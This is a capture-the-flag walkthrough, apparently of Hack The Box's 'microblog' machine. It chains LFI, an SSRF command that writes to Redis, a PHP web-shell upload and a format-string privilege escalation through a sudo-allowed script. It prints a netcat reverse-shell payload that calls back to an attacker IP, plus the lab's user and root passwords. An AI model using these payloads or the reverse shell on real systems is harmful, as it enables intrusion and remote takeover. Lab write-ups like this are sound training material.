Introduction
In this walkthrough , I’m going to explain how I pwned this medium box . This is surely not a medium box (expected to be hard). So let’s start 🙂
RECON
NMAP
In the Nmap scan we found that there are three ports open ( Port 22, 80 ,3000)
![](http://techyrick.com/wp-content/uploads/2023/05/image-1024x382.png)
Adding IP
While visiting the IP we can see that we have to add app.microblog.htb
to our /etc/hosts to access it locally .
Subdomain Enumeration
Found only 2 subdomains app & sunny . Add this both to our /etc/host file .
![](http://techyrick.com/wp-content/uploads/2023/05/image-1.png)
Now let’s visit the Site that we found .
Website
Register New Account on app.microblog.htb to check all the functionality .
![](http://techyrick.com/wp-content/uploads/2023/05/image-2-1024x594.png)
When we click on “Contribute Here !” we can see the source code of “app.microblog.htb“ .
![](http://techyrick.com/wp-content/uploads/2023/05/image-3-1024x422.png)
ENUMERATION
LFI
While checking the functionality I saw that we can use id parameter for LFI .
For that first create a blog and go to edit blog
![](http://techyrick.com/wp-content/uploads/2023/05/image-4-1024x739.png)
Now capture the request to add the h1/text
![](http://techyrick.com/wp-content/uploads/2023/05/image-5-1024x628.png)
In this request , check the ID parameter…………..you can use LFI .
![](http://techyrick.com/wp-content/uploads/2023/05/image-6-1024x370.png)
Getting Pro
On the Dashboard page and source code I saw something about pro . After few research I found the way to get pro .
Here is the resource for that : https://redis.io/commands/hset/
We have to assign pro to our session using ssrf.
Using this below command we can assign ourself as pro user .
curl -X "HSET" http://microblog.htb/static/unix:%2fvar%2frun%2fredis%2fredis.sock:testy%20pro%20true%20a/b
Note* : If you have entered any other username while registering then make sure to change that username in the cmd …………. I have used testy as a username so I used testy .
![](http://techyrick.com/wp-content/uploads/2023/05/image-7-1024x178.png)
Now we can also add image in the blog ……… I tried to get reverse shell but it was a rabbit hole , there was no image upload vulnerability . Rather due to pro , we can now have access to uploads directory .
FootHold
//Use this to get upload reverse shell on the target && change your blog name.
id=/var/www/microblog/<your_blog_name>/uploads/rev.php&header=<%3fphp+echo+shell_exec("rm+/tmp/f%3bmkfifo+/tmp/f%3bcat+/tmp/f|sh+-i+2>%261|nc+10.10.14.30+443+>/tmp/f")%3b%3f>
![](http://techyrick.com/wp-content/uploads/2023/05/image-8-1024x612.png)
After visiting the /uploads/rev.php we will get our reverse shell…….let’s see .
And Boom we got shell .
![](http://techyrick.com/wp-content/uploads/2023/05/image-1024x182.jpg)
USER
For user we have to connect to redis-cli using socks config file
// First Run this
redis-cli -s /var/run/redis/redis.sock
//then
keys *
//then we found user cooper.dooper
hgetall cooper.dooper
This above commands will get us user credentials
![](http://techyrick.com/wp-content/uploads/2023/05/Screenshot-from-2023-05-15-07-17-14-1024x582.png)
Now login with SSH cooper:zooperdoopercooper
![](http://techyrick.com/wp-content/uploads/2023/05/image-9-1024x411.png)
ROOT
Getting root on this machine is pretty confusing, below I will attach the resource 🙂
![](http://techyrick.com/wp-content/uploads/2023/05/image-10-1024x248.png)
By using sudo -l , I found that we can run /usr/bin/license && this file is readable …………….I tried many things and found this
https://podalirius.net/en/articles/python-format-string-vulnerabilities/
The format function is vulnerable
1. Register one user using redis-cli and use the above vulnerabity in username to print all variables .
HSET test2 username test1 password test first-name {license.__init__.__globals__} last-name test pro false
2. Now run /usr/bin/license as sudo to provision the license of our test2 user
sudo /usr/bin/license -p test2
3. This will print all the variable like this ……..
![](http://techyrick.com/wp-content/uploads/2023/05/Screenshot-from-2023-05-15-07-34-22-1024x558.png)
Now check for the secret key parameter in the output …………… you will find the password for root .
![](http://techyrick.com/wp-content/uploads/2023/05/image-11.png)
Now we got the ssh for root too 🙂 root:unCR4ckaBL3Pa$$w0rd
Then login as a root and grab the flag
![](http://techyrick.com/wp-content/uploads/2023/05/image-12-1024x412.png)
Conclusion
According to me this is not really a medium box, Still loved this box . I will give rating of 9/10 as a medium box.
Thanks for reading the blog ……………. for any doubts you can comment down here 🙂
Jai Shree Krishna ❤️